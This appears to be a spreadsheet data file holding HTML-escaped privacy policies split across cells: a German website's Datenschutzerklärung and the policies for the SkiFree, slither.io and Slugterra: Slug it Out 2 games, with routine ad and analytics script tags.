&lt;p&gt;&lt;b&gt;&lt;span style="font-size: 10pt;"&gt;Analyse-Tools und Tools von Drittanbietern&lt;/span&gt;&lt;/b&gt;&lt;/p&gt;_x005F_x000D_
&lt;p&gt;Beim Besuch unserer Website kann Ihr Surf-Verhalten statistisch ausgewertet werden. Das geschieht vor allem mit Cookies und mit sogenannten Analyseprogrammen. Die Analyse Ihres Surf-Verhaltens erfolgt in der Regel anonym; das Surf-Verhalten kann nicht zu</t>
  </si>
  <si>
    <t>Ihnen zurückverfolgt werden. Sie können dieser Analyse widersprechen oder sie durch die Nichtbenutzung bestimmter Tools verhindern.</t>
  </si>
  <si>
    <t>Detaillierte Informationen dazu finden Sie in der folgenden Datenschutzerklärung.&lt;/p&gt;_x005F_x000D_
&lt;p&gt;Sie können dieser Analyse widersprechen. Über die Widerspruchsmöglichkeiten werden wir Sie in dieser Datenschutzerklärung informieren.&lt;/p&gt;_x005F_x000D_
&lt;p&gt;&lt;b&gt;&lt;span style="font-size: 12pt;"&gt;&lt;br /&gt; 2. Allgemeine Hinweise und Pflichtinformationen&lt;/span&gt;&lt;/b&gt;&lt;/p&gt;_x005F_x000D_
&lt;p&gt;&lt;b&gt;&lt;span style="font-size: 10pt;"&gt;Datenschutz&lt;/span&gt;&lt;/b&gt;&lt;/p&gt;_x005F_x000D_
&lt;p&gt;Die Betreiber dieser Seiten nehmen den Schutz Ihrer persönlichen Daten sehr ernst.</t>
  </si>
  <si>
    <t>Wir behandeln Ihre personenbezogenen Daten vertraulich und entsprechend der gesetzlichen Datenschutzvorschriften sowie dieser Datenschutzerklärung.&lt;/p&gt;_x005F_x000D_
&lt;p&gt;Wenn Sie diese Website benutzen, werden verschiedene personenbezogene Daten erhoben. Personenbezogene Daten sind Daten, mit denen Sie persönlich identifiziert werden können. Die vorliegende Datenschutzerklärung erläutert, welche Daten wir erheben und wofür wir sie nutzen.</t>
  </si>
  <si>
    <t>Sie erläutert auch, wie und zu welchem Zweck das geschieht.&lt;/p&gt;_x005F_x000D_
&lt;p&gt;Wir weisen darauf hin, dass die Datenübertragung im Internet (z.B. bei der Kommunikation per E-Mail) Sicherheitslücken aufweisen kann.</t>
  </si>
  <si>
    <t>Ein lückenloser Schutz der Daten vor dem Zugriff durch Dritte ist nicht möglich.&lt;/p&gt;_x005F_x000D_
&lt;p&gt;&lt;b&gt;&lt;span style="font-size: 10pt;"&gt;Hinweis zur verantwortlichen Stelle&lt;/span&gt;&lt;/b&gt;&lt;/p&gt;_x005F_x000D_
&lt;p&gt;Die verantwortliche Stelle für die Datenverarbeitung auf dieser Website ist:&lt;br /&gt; Stefan Meyer-Kahlen&lt;br /&gt; Beuthstr. 5&lt;br /&gt; 40211 Düsseldorf&lt;/p&gt;_x005F_x000D_
&lt;p&gt;Telefon: +49-211-5150893&lt;br /&gt; E-Mail: &lt;span id="cloak81ab2323dd577cfff2b5b6197e96bbd1"&gt;Diese E-Mail-Adresse ist vor Spambots geschützt! Zur Anzeige muss JavaScript eingeschaltet sein!&lt;/span&gt;&lt;script type='text/javascript'&gt;
				document.getElementById('cloak81ab2323dd577cfff2b5b6197e96bbd1').innerHTML</t>
  </si>
  <si>
    <t>+ prefix + ':' + addy81ab2323dd577cfff2b5b6197e96bbd1 + '\'&gt;'+addy_text81ab2323dd577cfff2b5b6197e96bbd1+'&lt;\/a&gt;';
		&lt;/script&gt;&lt;/p&gt;_x005F_x000D_
&lt;p&gt;Verantwortliche Stelle ist die natürliche oder juristische Person, die allein oder gemeinsam mit anderen über die Zwecke und Mittel der Verarbeitung von personenbezogenen Daten (z.B. Namen, E-Mail- Adressen o. Ä.) entscheidet.&lt;/p&gt;_x005F_x000D_
&lt;p&gt;&lt;b&gt;&lt;span style="font-size: 10pt;"&gt;Widerruf Ihrer Einwilligung zur Datenverarbeitung&lt;/span&gt;&lt;/b&gt;&lt;/p&gt;_x005F_x000D_
&lt;p&gt;Viele Datenverarbeitungsvorgänge sind nur mit Ihrer ausdrücklichen Einwilligung möglich. Sie können eine bereits erteilte Einwilligung jederzeit widerrufen. Dazu reicht eine formlose Mitteilung per E-Mail an uns.</t>
  </si>
  <si>
    <t>Die Rechtmäßigkeit der bis zum Widerruf erfolgten Datenverarbeitung bleibt vom Widerruf unberührt.&lt;/p&gt;_x005F_x000D_
&lt;p&gt;&lt;b&gt;&lt;span style="font-size: 10pt;"&gt;SSL- bzw. TLS-Verschlüsselung&lt;/span&gt;&lt;/b&gt;&lt;/p&gt;_x005F_x000D_
&lt;p&gt;Diese Seite nutzt aus Sicherheitsgründen und zum Schutz der Übertragung vertraulicher Inhalte, wie zum Beispiel Bestellungen oder Anfragen, die Sie an uns als Seitenbetreiber senden, eine SSL-bzw. TLS- Verschlüsselung.</t>
  </si>
  <si>
    <t>Eine verschlüsselte Verbindung erkennen Sie daran, dass die Adresszeile des Browsers von “http://” auf “https://” wechselt und an dem Schloss-Symbol in Ihrer Browserzeile.&lt;/p&gt;_x005F_x000D_
&lt;p&gt;Wenn die SSL- bzw. TLS-Verschlüsselung aktiviert ist, können die Daten, die Sie an uns übermitteln, nicht von Dritten mitgelesen werden.&lt;/p&gt;_x005F_x000D_
&lt;p&gt;&lt;b&gt;&lt;span style="font-size: 10pt;"&gt;Auskunft, Sperrung, Löschung&lt;/span&gt;&lt;/b&gt;&lt;/p&gt;_x005F_x000D_
&lt;p&gt;Sie haben im Rahmen der geltenden gesetzlichen</t>
  </si>
  <si>
    <t>Bestimmungen jederzeit das Recht auf unentgeltliche Auskunft über Ihre gespeicherten personenbezogenen Daten, deren Herkunft und Empfänger und den Zweck der Datenverarbeitung und ggf. ein Recht auf Berichtigung, Sperrung oder Löschung dieser Daten. Hierzu sowie zu weiteren Fragen zum Thema personenbezogene Daten können Sie</t>
  </si>
  <si>
    <t>sich jederzeit unter der im Impressum angegebenen Adresse an uns wenden.&lt;/p&gt;_x005F_x000D_
&lt;p&gt;&lt;b&gt;&lt;span style="font-size: 10pt;"&gt;Widerspruch gegen Werbe-Mails&lt;/span&gt;&lt;/b&gt;&lt;/p&gt;_x005F_x000D_
&lt;p&gt;Der Nutzung von im Rahmen der Impressumspflicht veröffentlichten Kontaktdaten zur Übersendung von nicht ausdrücklich angeforderter Werbung und Informationsmaterialien wird hiermit widersprochen.</t>
  </si>
  <si>
    <t>Die Betreiber der Seiten behalten sich ausdrücklich rechtliche Schritte im Falle der unverlangten Zusendung von Werbeinformationen, etwa durch Spam-E-Mails, vor.&lt;/p&gt;_x005F_x000D_
&lt;p&gt;&lt;b&gt;&lt;span style="font-size: 12pt;"&gt;&lt;br /&gt; 3. Datenerfassung auf unserer Website&lt;/span&gt;&lt;/b&gt;&lt;/p&gt;_x005F_x000D_
&lt;p&gt;&lt;b&gt;&lt;span style="font-size: 10pt;"&gt;Cookies&lt;/span&gt;&lt;/b&gt;&lt;/p&gt;_x005F_x000D_
&lt;p&gt;Die Internetseiten verwenden teilweise so genannte Cookies. Cookies richten auf Ihrem Rechner keinen</t>
  </si>
  <si>
    <t>Schaden an und enthalten keine Viren. Cookies dienen dazu, unser Angebot nutzerfreundlicher, effektiver und sicherer zu machen. Cookies sind kleine Textdateien, die auf Ihrem Rechner abgelegt werden und die Ihr Browser speichert.&lt;/p&gt;_x005F_x000D_
&lt;p&gt;Die meisten der von uns verwendeten Cookies sind so genannte “Session-Cookies”.</t>
  </si>
  <si>
    <t>Sie werden nach Ende Ihres Besuchs automatisch gelöscht. Andere Cookies bleiben auf Ihrem Endgerät gespeichert bis Sie diese löschen. Diese Cookies ermöglichen es uns, Ihren Browser beim nächsten Besuch wiederzuerkennen.&lt;/p&gt;_x005F_x000D_
&lt;p&gt;Sie können</t>
  </si>
  <si>
    <t>Ihren Browser so einstellen, dass Sie über das Setzen von Cookies informiert werden und Cookies nur im Einzelfall erlauben, die Annahme von Cookies für bestimmte Fälle oder generell ausschließen sowie das automatische Löschen der Cookies beim Schließen des Browser aktivieren. Bei der Deaktivierung von Cookies kann die Funktionalität dieser Website eingeschränkt sein.&lt;/p&gt;_x005F_x000D_
&lt;p&gt;Cookies, die zur Durchführung des elektronischen Kommunikationsvorgangs oder zur Bereitstellung bestimmter, von Ihnen erwünschter Funktionen (z.B. Warenkorbfunktion) erforderlich sind, werden auf Grundlage von Art. 6 Abs. 1 lit.</t>
  </si>
  <si>
    <t>f DSGVO gespeichert. Der Websitebetreiber hat ein berechtigtes Interesse an der Speicherung von Cookies zur technisch fehlerfreien und optimierten Bereitstellung seiner Dienste. Soweit andere Coo</t>
  </si>
  <si>
    <t>&lt;html&gt;
    &lt;head&gt;
        &lt;meta property="version" content="2022-12-17"/&gt;
        &lt;meta property="published" content="2023-01-05"/&gt;
        &lt;meta property="template" content="adsense"/&gt;
        &lt;meta charset="utf-8"/&gt;
        &lt;meta content="width=device-width, initial-scale=1, shrink-to-fit=no" name="viewport"/&gt;
        &lt;meta content="" property="og:url"/&gt;
        &lt;meta content="website" property="og:type"/&gt;
        &lt;meta content="SkiFree Privacy Policy" property="og:title"/&gt;
        &lt;title&gt;SkiFree Privacy Policy&lt;/title&gt;
            &lt;script async
                    src="https://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js?client=ca-pub-7841493567155718"
                    crossorigin="anonymous"&gt;&lt;/script&gt;
        &lt;style&gt;
            * {
    -webkit-font-smoothing: antialiased;
    -moz-osx-font-smoothing: grayscale;
    font-family: Arial, sans-serif;
}
body {
  padding: 0;
  margin: 0;
  -webkit-text-size-adjust: 100%;
  -webkit-font-smoothing: antialiased;
  -moz-osx-font-smoothing: grayscale;
  text-rendering: optimizeLegibility;
  -webkit-font-feature-settings: "pnum";
  font-feature-settings: "pnum";
  font-variant-numeric: proportional-nums;
  position: relative;
  background: #fff;
}
.container {
    padding-right: 0;
    padding-left: 0;
    margin-right: auto;
    margin-left: auto;
}
@media (min-width: 768px) {
    .container {
        width: 738px;
        padding-right: 15px;
        padding-left: 15px;
        margin-right: auto;
        margin-left: auto;
    }
}
@media (min-width: 992px) {
    .container {
        width: 962px;
    }
}
@media (min-width: 1200px) {
    .container {
        width: 1170px;
    }
}
.main-container {
    color: #222;
    text-align: left ! important;
    padding: 2em;
    background: #fff;
    min-height: 400px;
    -webkit-box-shadow: 0 0 3px 0 rgba(0, 0, 0, .25);
    -moz-box-shadow: 0 0</t>
  </si>
  <si>
    <t xml:space="preserve">[]).push({});
    &lt;/script&gt;
&lt;/div&gt;
                &lt;div class="main-container"&gt;
                    &lt;h2 style="margin-top:0;"&gt;SkiFree Privacy Policy&lt;/h2&gt;
                    &lt;hr style="margin-bottom: 1em;"&gt;
                    &lt;div id="content"&gt;
                        &lt;div&gt; &lt;p&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;Guinea Pig Games LLC built the _x005F_x000D_
SkiFree app as                   a Commercial app. This SERVICE is _x005F_x000D_
provided by                   Guinea Pig Games LLC  and is intended for _x005F_x000D_
use as                   is.                  &lt;/p&gt; &lt;p&gt;                   _x005F_x000D_
</t>
  </si>
  <si>
    <t>This page is used to inform visitors regarding our                   _x005F_x000D_
policies with the collection, use, and disclosure of Personal           _ x000D_
        Information if anyone decided to use our Service.                _</t>
  </si>
  <si>
    <t>x000D_
  &lt;/p&gt; &lt;p&gt;                    If you choose to use our Service, then you _x005F_x000D_
agree to                   the collection and use of information in _x005F_x000D_
relation to this                   policy. The Personal Information that_x005F_x000D_
 we collect is                   used for providing and improving the _</t>
  </si>
  <si>
    <t xml:space="preserve">x000D_
Service. We will not use or share your information with                 _ x000D_
  anyone except as described in this Privacy Policy.                 </t>
  </si>
  <si>
    <t xml:space="preserve">&lt;/p&gt; &lt;p&gt;_x005F_x000D_
                    The terms used in this Privacy Policy have the same _x005F_x000D_
meanings                   as in our Terms and Conditions, which is _x005F_x000D_
accessible at SkiFree unless otherwise defined in_x005F_x000D_
 this Privacy Policy.                  &lt;/p&gt; &lt;p&gt;&lt;strong&gt;Information Collection and Use&lt;/strong&gt;&lt;/p&gt; &lt;p&gt;_x005F_x000D_
                   </t>
  </si>
  <si>
    <t>For a better experience, while using our Service, we _x005F_x000D_
                  may require you to provide us with certain personally _x005F_x000D_
                  identifiable information. The information that        _x005F_x000D_
           we request will be retained by us and used as described in _x005F_x000D_
this privacy policy.                  &lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;div&gt;&lt;p&gt;                     _x005F_x000D_
 The app does use third party services that may collect                  _x005F_x000D_
   information used to identify you.                    &lt;/p&gt; &lt;p&gt;         _</t>
  </si>
  <si>
    <t>x000D_
            Link to privacy policy of third party service providers used_x005F_x000D_
                     by the app                   &lt;/p&gt; &lt;ul&gt;&lt;li&gt;&lt;a rel="nofollow" target="_blank" href="https://www.google.com/policies/privacy/"&gt;Google Play Services&lt;/a&gt;&lt;/li&gt;&lt;/ul&gt;&lt;/div&gt; &lt;p&gt;&lt;strong&gt;Log Data&lt;/strong&gt;&lt;/p&gt; &lt;p&gt;_x005F_x000D_
                   We want to inform you that whenever you              _</t>
  </si>
  <si>
    <t xml:space="preserve">x000D_
     use our Service, in a case of an error in the app                  _x005F_x000D_
 we collect data and information (through third party                   _x005F_x000D_
products) on your phone called Log Data. This Log Data may              _x005F_x000D_
     include information such as your device Internet Protocol          _x005F_x000D_
         (“IP”) address, device name, operating system version, the     _x005F_x000D_
              configuration of the app when utilizing our Service,      _x005F_x000D_
             the time and date of your use of the Service, and other    _ x000D_
               statistics.                 </t>
  </si>
  <si>
    <t xml:space="preserve">&lt;/p&gt; &lt;p&gt;&lt;strong&gt;Cookies&lt;/strong&gt;&lt;/p&gt; &lt;p&gt;_x005F_x000D_
                   Cookies are files with a small amount of data that _x005F_x000D_
are                   commonly used as anonymous unique identifiers. _x005F_x000D_
 These are sent                   to your browser from the websites that _x005F_x000D_
you visit and are                   stored on your device's internal _x005F_x000D_
memory.                 </t>
  </si>
  <si>
    <t xml:space="preserve">&lt;/p&gt; &lt;p&gt;                    This Service does not_x005F_x000D_
 use these “cookies” explicitly. However,                   the app may _x005F_x000D_
use third party code and libraries that use                   “cookies” _x005F_x000D_
to collect information and improve their services.                   </t>
  </si>
  <si>
    <t>You_x005F_x000D_
 have the option to either accept or refuse these cookies               _x005F_x000D_
    and know when a cookie is being sent to your device. If you         _x005F_x000D_
          choose to refuse our cookies, you may not be able to use some _x005F_x000D_
                  portions of this Service.                  &lt;/p&gt; &lt;p&gt;&lt;strong&gt;Service Providers&lt;/strong&gt;&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;p&gt;_x005F_x000D_
                   We may employ third-party companies and              _x005F_x000D_
     individuals due to the following reasons:                 &lt;/p&gt; &lt;ul&gt;&lt;li&gt;To facilitate our Service;&lt;/li&gt; &lt;li&gt;To provide the Service on our behalf;&lt;/li&gt; &lt;li&gt;To perform Service-related services; or&lt;/li&gt; &lt;li&gt;To assist us in analyzing how our Service is used.&lt;/li&gt;&lt;/ul&gt; &lt;p&gt;_x005F_x000D_
                   We want to inform users of this Service              _x005F_x000D_
     that these third parties have access to your Personal              _ x000D_
     Information.</t>
  </si>
  <si>
    <t>The reason is to perform the tasks assigned to        _x005F_x000D_
           them on our behalf. However, they are obligated not to       _x005F_x000D_
            disclose or use the information for any other purpose.       _</t>
  </si>
  <si>
    <t xml:space="preserve">x000D_
           &lt;/p&gt; &lt;p&gt;&lt;strong&gt;Security&lt;/strong&gt;&lt;/p&gt; &lt;p&gt;                   _x005F_x000D_
 We value your trust in providing us your                   Personal _x005F_x000D_
Information, thus we are striving to use commercially                   _x005F_x000D_
acceptable means of protecting it. But remember that no method          _x005F_x000D_
         of transmission over the internet, or method of electronic     _x005F_x000D_
              storage is 100% secure and reliable, and we cannot        _x005F_x000D_
           guarantee its absolute security.                 </t>
  </si>
  <si>
    <t>&lt;/p&gt; &lt;p&gt;&lt;strong&gt;Links to Other Sites&lt;/strong&gt;&lt;/p&gt; &lt;p&gt;_x005F_x000D_
                    This Service may contain links to other sites.</t>
  </si>
  <si>
    <t>If you_x005F_x000D_
 click on                   a third-party link, you will be directed to _x005F_x000D_
that site. Note                   that these external sites are not _x005F_x000D_
operated by us.                    Therefore, we strongly advise you to _x005F_x000D_
review the                   Privacy Policy of these websites.</t>
  </si>
  <si>
    <t xml:space="preserve">We have  _x005F_x000D_
                 no control over and assume no responsibility for the _x005F_x000D_
content,                   privacy policies, or practices of any _x005F_x000D_
third-party sites or                   services.                  &lt;/p&gt; &lt;p&gt;&lt;strong&gt;Children’s Privacy&lt;/strong&gt;&lt;/p&gt; &lt;p&gt;_x005F_x000D_
                   </t>
  </si>
  <si>
    <t>These Services do not address anyone under the age of_x005F_x000D_
 13.                    We do not knowingly collect personally           _x005F_x000D_
        identifiable information from children under 13 years of age. In_x005F_x000D_
 the case                   we discover that a child under 13 has _x005F_x000D_
provided                   us with personal information, we immediately _x005F_x000D_
                  delete this from our servers.</t>
  </si>
  <si>
    <t>If you are a parent or _x005F_x000D_
guardian                   and you are aware that your child has _x005F_x000D_
provided us with                   personal information, please contact _x005F_x000D_
us so that                   we will be able to do necessary actions.    _ x000D_
              &lt;/p&gt; &lt;p&gt;&lt;strong&gt;Changes to This Privacy Policy&lt;/strong&gt;&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;p&gt;_x005F_x000D_
                   We may update our Privacy Policy from                _ x000D_
   time to time. Thus, you are advised to review this page              _x005F_x000D_
     periodically for any changes.</t>
  </si>
  <si>
    <t xml:space="preserve">We will                   notify you _x005F_x000D_
of any changes by posting the new Privacy Policy on                   _x005F_x000D_
this page.                  &lt;/p&gt; &lt;p&gt; This policy is effective as of 2022-11-25&lt;/p&gt; &lt;p&gt;&lt;strong&gt;Contact Us&lt;/strong&gt;&lt;/p&gt; &lt;p&gt;_x005F_x000D_
                   If you have any questions or suggestions about our   _x005F_x000D_
                Privacy Policy, do not hesitate to contact us at _x005F_x000D_
guineapiggamesllc@gmail.com.                 </t>
  </si>
  <si>
    <t>&lt;/p&gt; &lt;p&gt; This privacy policy page was created at &lt;a rel="nofollow" target="_blank" href="https://privacypolicytemplate.net/"&gt;privacypolicytemplate.net &lt;/a&gt;and modified/generated by &lt;a rel="nofollow" target="_blank" href="https://app-privacy-policy-generator.nisrulz.com/"&gt;App Privacy Policy Generator&lt;/a&gt;&lt;/p&gt;&lt;/div&gt;
                    &lt;/div&gt;
                &lt;/div&gt;
                &lt;div class="main-container" style="margin-top:20px;"&gt;
                    &lt;ins class="adsbygoogle"
     style="display:block"
     data-ad-format="autorelaxed"
     data-ad-client="ca-pub-7841493567155718"
     data-ad-slot="3760930508"&gt;&lt;/ins&gt;
&lt;script&gt;
    (adsbygoogle = window.adsbygoogle || []).push({});
&lt;/script&gt;
                &lt;/div&gt;
            &lt;/div&gt;
        &lt;/div&gt;
        &lt;footer&gt;
    &lt;div class="container"&gt;
        &lt;div class="row"&gt;
            &lt;div class="col-xs-12 col-md-6" style="text-align:left;margin:auto;vertical-align:middle;"&gt;
                &lt;div id="attribution"&gt;
                    &lt;p&gt;
                        Document hosted by
                        &lt;a href="https://www.flycricket.com"&gt;Flycricket&lt;/a&gt;
                        &amp;bull;
                        &lt;a href="https://flycricket.com/privacy.html"&gt;Privacy Policy&lt;/a&gt;
                        &amp;bull;
                        &lt;a href="https://flycricket.com/cookie_policy.html"&gt;Cookie Policy&lt;/a&gt;
                        &amp;bull;
                        &lt;a href="https://flycricket.com/terms.html"&gt;Terms of Use&lt;/a&gt;&lt;/p&gt;
                &lt;/div&gt;
            &lt;/div&gt;
        &lt;/div&gt;
    &lt;/div&gt;
&lt;/footer&gt;
        &lt;script async src="https://www.googletagmanager.com/gtag/js"&gt;&lt;/script&gt;
&lt;script&gt;
    window.dataLayer</t>
  </si>
  <si>
    <t>&lt;!DOCTYPE html&gt;
&lt;html&gt;
	&lt;head&gt;
		&lt;title&gt;slither.io - privacy policy&lt;/title&gt;
		&lt;style type="text/css"&gt;
		html, body { height:100%; background-color: #202020;}
		body { margin:0; padding:0; }
		&lt;/style&gt;
	&lt;/head&gt;
	&lt;body&gt;
&lt;div style='color: #80d080; font-family: Verdana; font-size: 16px;'&gt;
 &lt;div style='text-align: center; font-weight: bold; margin-top: 15px;'&gt;
  slither.io Privacy Policy
 &lt;/div&gt;
 &lt;div style='margin-top: 24px; margin-bottom: 64px; width: 450px; margin-left: auto; margin-right: auto; color: #a080e0; font-size: 13px;'&gt;
 Last updated 14th March 2017&lt;BR&gt;&lt;BR&gt;
Lowtech Studios respects the privacy concerns of all users of its Services. The only information we currently collect is the IP address of the user, the game settings they select (nickname, skin, etc. necessary for multiplayer gameplay), and the primary language setting on the user's device.</t>
  </si>
  <si>
    <t xml:space="preserve">We discard all of this information soon after the game ends.&lt;BR&gt;&lt;BR&gt;
We have a third party affiliation with Google AdMob. You may review their privacy policy if you are concerned about the data they might collect.&lt;BR&gt;&lt;BR&gt;
 Lowtech Studios may disclose information to appropriate third parties in special cases where legal action is required.&lt;BR&gt;&lt;BR&gt;
By using the Services, you agree to recognize and be bound by this Privacy Policy, and you consent to the collection and use of your data as articulated in its terms.&lt;BR&gt;&lt;BR&gt;
</t>
  </si>
  <si>
    <t>We may occasionally revise our privacy policy by posting the changes here.
  &lt;/div&gt;
&lt;/div&gt;
	&lt;/body&gt;
&lt;/html&gt;</t>
  </si>
  <si>
    <t>&lt;!DOCTYPE html&gt;
&lt;html&gt;
&lt;head&gt;
&lt;title&gt;Slugterra: Slug it Out 2 Privacy Policy&lt;/title&gt;
&lt;meta charset="UTF-8"&gt;
&lt;meta name="viewport" content="width=device-width, initial-scale=1"&gt;
&lt;link rel="stylesheet" href="css/style.css"&gt;
&lt;link rel="stylesheet" href="https://fonts.googleapis.com/ css?family=Lato"&gt;
&lt;link rel="stylesheet" href="https://fonts.googleapis.com/ css?family=Montserrat"&gt;
&lt;link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/4.7.0/css/font-awesome.min.css"&gt;
&lt;style&gt;
body,h1,h2,h3,h4,h5,h6 {font-family: "Lato", sans-serif}
.w3-bar,h1,button {font-family: "Montserrat", sans-serif}
.fa-anchor,.fa-coffee {font-size:200px}
&lt;/style&gt;
&lt;!--</t>
  </si>
  <si>
    <t>Global site tag (gtag.js) - Google Analytics --&gt;
&lt;script async src="https://www.googletagmanager.com/gtag/js?id=UA-157017425-2"&gt;&lt;/script&gt;
&lt;script&gt;
  window.dataLayer = window.dataLayer || [];
  function gtag(){dataLayer.push(arguments);}
  gtag('js', new Date());
  gtag('config', 'UA-157017425-2');
&lt;/script&gt;
&lt;/head&gt;
&lt;body&gt;
&lt;!-- Navbar --&gt;
&lt;div class="w3-top"&gt;
  &lt;div class="w3-bar w3-red w3-card-2 w3-left-align w3-large"&gt;
    &lt;a class="w3-bar-item w3-button w3-hide-medium w3-hide-large w3-right w3-padding-large w3-hover-white w3-large w3-red" href="javascript:void(0);" onclick="myFunction()" title="Toggle</t>
  </si>
  <si>
    <t>Navigation Menu"&gt;&lt;i class="fa fa-bars"&gt;&lt;/i&gt;&lt;/a&gt;
    &lt;a href="/index.html" class="w3-bar-item w3-button w3-hide-small w3-padding-large w3-hover-white"&gt;Games&lt;/a&gt;
    &lt;a href="/terms-of-use.html" class="w3-bar-item w3-button w3-hide-small w3-padding-large w3-hover-white"&gt;Terms of Use&lt;/a&gt;
    &lt;a href="/privacy-policy.html" class="w3-bar-item w3-button w3-hide-small w3-padding-large w3-hover-white"&gt;Privacy Policy&lt;/a&gt;
    &lt;a href="https://epicstory.atlassian.net/servicedesk/customer/portals" class="w3-bar-item w3-button w3-hide-small w3-padding-large w3-hover-white"&gt;Support&lt;/a&gt;
    &lt;a href="https://www.epicstoryinteractive.com" class="w3-bar-item w3-button w3-padding-large w3-white" style="float:right;"&gt;Corporate Site&lt;/a&gt;
	&lt;img src="/images/controller.png" alt="Epic Story Interactive" style="width:50px; float:right; margin-right: 20px"&gt;
  &lt;/div&gt;
  &lt;!-- Navbar on small screens --&gt;
  &lt;div id="navDemo" class="w3-bar-block w3-white w3-hide w3-hide-large w3-hide-medium w3-large"&gt;
	  &lt;!--    &lt;a href="about.html" class="w3-bar-item w3-button w3-padding-large"&gt;About Us&lt;/a&gt; --&gt;
    &lt;a href="/index.html" class="w3-bar-item w3-button w3-padding-large"&gt;Games&lt;/a&gt;
    &lt;a href="/terms-of-use.html" class="w3-bar-item w3-button w3-padding-large"&gt;Terms of Use&lt;/a&gt;
    &lt;a href="/privacy-policy.html" class="w3-bar-item w3-button w3-padding-large"&gt;Privacy Policy&lt;/a&gt;
    &lt;a href="https://epicstory.atlassian.net/servicedesk/customer/portals" class="w3-bar-item w3-button w3-padding-large"&gt;Support&lt;/a&gt;
	&lt;img src="/images/controller.png" alt="Epic Story Interactive" style="width:50px; float:right; margin-right: 20px"&gt;
  &lt;/div&gt;
&lt;/div&gt;
&lt;!-- First Grid --&gt;
&lt;div class="w3-row-padding w3-padding-64 w3-container"&gt;
  &lt;div class="w3-content"&gt;
    &lt;div class="w3-col"&gt;
      &lt;h1&gt;Slugterra: Slug it Out 2 Privacy Policy&lt;/h1&gt;
      &lt;p&gt;Last Updated: December 23, 2021&lt;/p&gt;
&lt;p&gt;Epic Story Interactive Inc. respects your privacy rights and this policy sets out to describe how your personal information is collected and processed by Epic Story Interactive Inc. (“ESI”) when you use the Slugterra: Slug it Out 2 mobile app (the “App”).&lt;/p&gt;
&lt;p&gt;ESI provides privacy protection for users of the App of all ages, including children as defined by the Children’s Online Privacy Protection Act (“COPPA”) and the General Data Protection Regulation (“GDPR”).&lt;/p&gt;
&lt;p&gt;</t>
  </si>
  <si>
    <t>We reserve the right to update this Privacy Policy. Updates to the Privacy Policy will be indicated by revising the date at the beginning of the Privacy Policy. Additional notice will be provided to you depending on the specific change, such as those that require renewed or additional consent.&lt;/p&gt;
&lt;h2&gt;Collection of Information&lt;/h2&gt;
&lt;p&gt;</t>
  </si>
  <si>
    <t>We strive to collect only the personal information that we need to provide you with the best possible experience in the App.&lt;/p&gt;
&lt;h2&gt; Information You Provide to Us&lt;/h2&gt;
&lt;p&gt; The App will not request from you any personal data as defined by COPPA and GDPR.</t>
  </si>
  <si>
    <t>We do not request any information that may identify you, including where you live or your appearance.&lt;/p&gt;
&lt;h2&gt;Information We Collect Automatically&lt;/h2&gt;
&lt;p&gt; We automatically collect the following information when you use the App:&lt;/p&gt;
&lt;ul&gt;
	&lt;li&gt;Device information: We collect information about your use of the App, including the make and model of your device, its operating system, and the times it has accessed the App.&lt;/li&gt;
	&lt;li&gt;Usage information: We collect information that relates to your use of the App, such as your game progress, your time spent in the game, and your purchases. We also collect your general geographic location at the country level.&lt;/li&gt;
	&lt;li&gt;Log information: We collect information about the moments in the App when it connects to our servers and retrieves content and data required to operate the App.</t>
  </si>
  <si>
    <t>The collected information includes the content or data being requested and the IP address of the device making the request.&lt;/li&gt;
&lt;/ul&gt;
&lt;h2&gt;Information We Collect from You and Other Sources&lt;/h2&gt;
&lt;p&gt;Purchases in the App are handled by your respective device platform’s payment gateway. We do not have access to your payment details such as the payment method, the name of the payee, and the payment details (such as credit card numbers or email addresses associated with payment platforms). We are provided with pseudonymized information about your transaction, such as the item(s) you purchased in the App, the date and time of your purchase, your payment currency, the amount of your transaction, your country, and in some cases your state and your postal code.&lt;/p&gt;
&lt;p&gt;Upon installing the App on your device and launching it for the first time, your device’s identification will be collected to determine if you installed the App after viewing an advertisement on your device in another mobile application.</t>
  </si>
  <si>
    <t>Your device's identification may be used to serve targeted advertising. Your device's identification will not be used to serve targeted advertising if you are a child under COPPA or GDPR regulations. On certain operating systems you can notify us that you do not want us to serve you targeted advertising using your device's identification.&lt;/p&gt;
&lt;h2&gt;Usage of Information&lt;/h2&gt;
&lt;p&gt;</t>
  </si>
  <si>
    <t>We use your personal data only to the extent needed to fulfill your requests in the App and to support the operation of the App.&lt;/p&gt;
&lt;h2&gt;Device Information&lt;/h2&gt;
&lt;p&gt;We aggregate your device information to maintain the App and provide a satisfactory experience. For example, we use the aggregate data on device information to determine minimum hardware standards for the App.&lt;/p&gt;
&lt;h2&gt;Usage Information&lt;/h2&gt;
&lt;p&gt;We aggregate your usage information to maintain the App and provide a satisfactory experience. For example, we collect and aggregate information on users’ progress in the App in order to determine if any changes need to be made to improve the user experience.&lt;/p&gt;
&lt;h2&gt;</t>
  </si>
  <si>
    <t>Log Information&lt;/h2&gt;
&lt;p&gt;We store information about your content and data requests to our servers for log purposes only. This data is pseudonymized and encrypted at rest.&lt;/p&gt;
&lt;h2&gt;Storage of Information&lt;/h2&gt;
&lt;p&gt;We store your information for the time needed to operate the App and fulfill your requests through the App. Your personal data is deleted or anonymized when it is no longer needed to operate the App for your usage and in any event no later than three (3) years after your interaction with ESI has ceased.&lt;/p&gt;
&lt;h2&gt;Sharing of Information&lt;/h2&gt;
&lt;p&gt;</t>
  </si>
  <si>
    <t>We do not share your personal information with third parties except in the following ways:&lt;/p&gt;
&lt;ul&gt;
	&lt;li&gt;With third-party vendors, consultants, and other service providers who work for us and need to access your personal information to do that work&lt;/li&gt;
	&lt;li&gt;If appropriate to&lt;/li&gt;
	&lt;ul&gt;
		&lt;li&gt;comply with laws or to respond to lawful requests and legal processes, including, for example, to comply with a court order or subpoena;&lt;/li&gt;
		&lt;li&gt;protect the rights and property of ESI, our agents, our customers, and others, including to enforce our terms, policies, rules, and agreements&lt;/li&gt;
		&lt;li&gt;protect the safety and security of any person; and/or&lt;/li&gt;
		&lt;li&gt;protect the safety and security of ESI's and our partners' Services, websites, and applications.&lt;/li&gt;
	&lt;/ul&gt;
